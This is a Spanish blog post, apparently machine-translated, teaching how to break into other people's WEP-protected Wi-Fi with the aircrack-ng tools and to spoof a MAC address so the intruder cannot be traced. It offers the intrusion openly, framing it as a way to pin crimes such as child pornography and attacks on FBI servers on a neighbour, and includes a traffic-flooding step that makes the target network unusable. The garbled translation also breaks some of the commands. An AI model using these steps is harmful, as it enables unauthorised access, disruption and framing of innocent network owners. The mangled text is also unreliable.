Como hackear Wifi
Para comenzar deben tener el sistema backtrack de Linux en sus computadoras de otra forma esto no funcionara.
Este tutorial te enseñará a
agrietarse y conectarse a cualquier wifi protegida con seguridad WEP o WPA con
la función
WPS habilitado. Esto hará
que parezca que su vecino era el pajas de pornografía infantil, la compra de medicamentos, y
el montaje del dos ataques contra los servidores del FBI. Yo también le enseñará cómo falsificar su dirección mac - esto evitará que alguien con acceso al router se
conecta a partir de averiguar quién
eres. Voy a estar asumiendo que todos ustedes se están ejecutando algunos distro linux.
################# ~ Suplantación de direcciones MAC ~ ###################
Este es un paso esencial para conectar a wifi del
somone más.
Si usted sigue estos pasos, no habrá
pruebas de que usted era el que está
conectado a la red.
Tipo:
sudo ifconfig wlan0 abajo
sudo macchanger -r wlan0
sudo ifconfig wlan0 hasta
Esto es lo que parece cuando lo hago:
blargh
@ Blargh-D: ~ $ sudo ifconfig wlan0 abajo
[Sudo]
password para blargh:
blargh
@ Blargh-D: ~ $ sudo macchanger -r wlan0
Permanente
MAC: 8c: a9: 82: 12: a0: c4 (Intel Corporate)
Current MAC: 8c: a9: 82:
12: a0: c4 (Intel Corporate)
Nuevo
MAC: ca: fb: 86: d3: 68: c5 (desconocido)
blargh
@ Blargh-D: ~ $ sudo ifconfig wlan0 hasta
Si te da una mierda "wlan0: ERROR mientras que
consigue banderas de interfaz: No existe el dispositivo"
hacer esto:
sudo
airmon-ng
para mí
esto da:
Código:
Seleccionar todo
Interfaz
conductor Chipset
wlan0
Desconocido iwlwifi - [phy0]
simplemente sustituir su interfaz para wlan0 en los
pasos anteriores si te da el no mencionado error tal dispositivo.
Puede que tenga que instalar algo. Para hacer este
tipo:
sudo apt-get install <la mierda que usted necesita
para instalar>
haciendo ifconfig wlan0 hacia abajo y luego traerlo de
vuelta otra vez, probablemente le de lo que ya está conectado a desconectar, así que es posible que desee volver a
conectar.
#################### ~ Breaking WEP wifi garantizado ~
######################
Paso uno: leer mis cosas sobre la suplantación de su dirección mac - usted no desea conseguir a tope
violada en la cárcel
Tipo:
sudo ifconfig wlan0 abajo
sudo airodump-ng wlan0
el segundo comando comenzará a imprimir un montón de información acerca de la diversión de todas las redes wifi en rango. Aquí es lo que parece para mí:
Código:
Seleccionar todo
CH
1] [transcurridos 32 s] [24.08.2013 01:02
BSSID PWR Balizas #Data, #
/ s CH MB ENC CIPHER AUTH ESSID
00: 18: 01: FF: 1C: C0 -70
114 5 0 6 54e. WEP WEP estos
00: 1F: 33: E4: 5F: 48 -79
46 0 0 6 54e. Essids WPA2 PSK CCMP
00: 26: B8: 99: F2: BF -81
45 2 0 11 54e. WEP WEP son
74:
44: 01: 5A: 01: 25 -82 14 1 0 1 54e WPA2 PSK CCMP bullshit
A0:
21: B7: 73: B6: 5F -83 25 7 3 1 54e WPA2 PSK y CCMP
36:
46: 9A: 00: 1C: BC -86 11 0 0 3 54e. WPA2 PSK CCMP la
00: 1F: 90: E0: F3: C8 -85
13 1 0 6 54e. BSSIDs WEP WEP
30: 46: 9A: 00: 1C: BC -86
11 0 0 3 54e. WPA2 CCMP PSK son
00:
13: 46: D2: 38: 06 -88 17 0 0 6 54. WPA TKIP PSK falsa
00:
7F: 28: CA: 87: 99 -88 6 0 0 11 54e. WPA2 PSK CCMP FuckThePolice
BSSID
ESTACIÓN
PWR Rate pierden paquetes Sondas
00: 18: 01: FF: 1C: C0 F0:
6B: CA: 13: 1D: 07 -49 a 0 - 6 0 1
A0:
21: B7: 73: B6: 5F 74: 44: 01: 5A: 01: 24 -81 0 - 1e 0 7
(No
asociado) 00: 1C: 10: E7: E5: 3B -83 0 - 1 0 2
Hit ctrl + c cuando vea una red WEP asegurado que
desea atacar. Ahora tenemos que capturar un montón de información sobre esa red y lo ponemos en un
archivo.
Tipo:
sudo airodump-ng-c <canal> w <nombre de
archivo> --bssid <BSSID> wlan0
A continuación,
se verá así:
Código: Seleccionar todo
CH
3] [transcurrido: 1 s] [08/24/2013 1:47] [wlan0 canal fijo: -1
BSSID PWR RXQ Balizas
#Data, # / s CH MB ENC CIPHER AUTH E
00: 18: 01: FF: 1C: C0 -77
10 6 0 0 6 54e. WEP WEP 3
BSSID
ESTACIÓN
PWR Rate pierden paquetes Sondas
Usted tendrá
que esperar un tiempo para que este haga su trabajo. Mientras espera abrir una
segunda terminal y hacer:
sudo aireplay-ng -1 0 -a <BSSID> -h 00: 11: 22:
33: 44: 55 -e <ESSID> wlan0
usted debe conseguir un mensaje reasuring
"Asociación éxito" en unos pocos segundos.
Ahora hacer:
sudo aireplay-ng -3-b <BSSID> -h 00: 11: 22: 33:
44: 55 wlan0
Esto creará un
montón
de mierda métrica
de tráfico
en la red de destino y la velocidad de tu ataque. Se crea tanto tráfico que la red será un-utilizable mientras se está ejecutando. Después de unos minutos su terminal irá mierda de murciélago loco mostrando paquetes lectura y
escritura. Tienes que esperar a que la columna de la #Data del primer símbolo del sistema para ir por encima de
10.000 o menos. Es posible que necesite más
de 10k, pero 10000 ha sido lo suficientemente mayor parte del tiempo lo he
hecho. Debe levantarse dar un paseo, escuchar música y tener relaciones sexuales mientras
está
esperando para que esto suceda. Se puede tomar un tiempo, dependiendo de la
intensidad de la señal.
Ahora es el momento de correr la misma grieta. Tipo:
sudo aircrack-ng-b <BSSID> <nombre de
archivo, 01.cap>
obviamente .cap es una extensión de archivo y nombre de archivo es el
nombre del archivo que eligió
anteriormente. Siempre se puede buscar en el directorio de casa y mirar el
archivo.
Si todo funciona correctamente el comando aformetioned
debe producir un resultado buscando algo como esto:
Código:
Seleccionar todo
Apertura
fuckThePoliece-01.cap
Ataque
se reiniciará
cada 5000 IVS capturados
A
partir ataque PTW con 72.370 IVS
Encontraban
la clave! [B2: 69: 20: 1E: CC]
Descifrado
correctamente: 100%
Usted puede utilizar el material siguiente "encontraban
la clave!" (Sin los corchetes obviamente) como la contraseña al conectarse a la wifi.
######################## ~ WPA con WPS habilitado ~
#################### ##
Las instrucciones WEP tomaron más tiempo para escribir de lo que yo pensé que iban y yo no tengo ganas de escribir
más.
Aquí
hay un enlace a un tutorial que encontré
con una búsqueda
en Google:
http://lifehacker.com/5873407/how-a-grieta-a-wi+fi-redes-wpa-password-con-reaver
Está
destinado a linux backtrack, pero podría fácilmente instalar los paquetes necesarios
en cualquier distro. Puedo volver en un futuro y edito esto con un tutorial
escrito personalmente para WPA, pero en este momento pereza es el rey.
Comentarios
Publicar un comentario